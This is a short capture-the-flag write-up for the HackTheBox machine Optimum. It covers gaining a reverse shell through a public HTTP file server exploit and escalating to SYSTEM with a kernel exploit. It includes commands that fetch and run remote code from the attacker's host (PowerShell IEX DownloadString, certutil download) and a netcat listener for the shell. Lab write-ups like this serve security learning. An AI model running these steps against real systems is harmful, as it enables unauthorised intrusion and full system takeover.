Hackthebox - Optimum
Windows
Nmap
Port 80
If we google it we find this exploit right away
We have to get nc.exe in our attacking machine. Kali has binaries hosted so we can just copy and paste it in our working dir like this
cp /usr/share/windows-resources/binaries/nc.exe .
We have to serve netcat using python http server
python3 -m http.server 80
Then we have to modify the script and add our ip address and our port (I left 443)
We set a listener
rlwrap nc -lvp 443
We launch our exploit
python2 39161 10.10.10.8 80
Privesc
Win version
Kernel exploits
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3/Sherlock.ps1') | powershell -noprofile -
Let's find another exploit than the one mentioned in Sherlock (does not work)
searchsploit ms16-032
Tried a few exploits but none worked
On google I found this
And in the comment they mention this exe file
We download it in our kali
Serve it with python
certutil.exe -urlcache -f http://10.10.14.3/41020.exe exploit.exe
get it in our targetWe launch it we get a system shell
We can grab the root flag
Last updated